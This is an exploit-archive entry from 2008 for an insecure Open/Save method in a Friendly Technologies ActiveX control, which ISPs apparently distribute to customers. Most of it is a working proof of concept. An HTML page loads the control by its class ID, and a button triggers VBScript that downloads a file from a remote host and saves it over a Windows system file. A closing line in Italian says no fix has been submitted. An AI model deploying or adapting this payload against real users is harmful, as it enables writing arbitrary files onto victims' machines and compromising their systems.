Friendly Technologies (Open-Save) ActiveX Insecure Method Exploit
2008-08-30 10:01:04-----------------------------------------------------------------------------
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up thire connections.
They also provide remote configuration solutions .. not the best idea if you ask me.
THIS Bug Found by : S4rK3VT Hacking TEAM
C0d3d by : Ciph3r
We Are : Ciph3r & Rake
[email protected]
[email protected]
-----------------------------------------------------------------------------
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://victim.com/victimfile.doc"
test.Open remURL, True
test.Save "C:\WINDOWS\_system.ini", True
End Sub
</script>
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.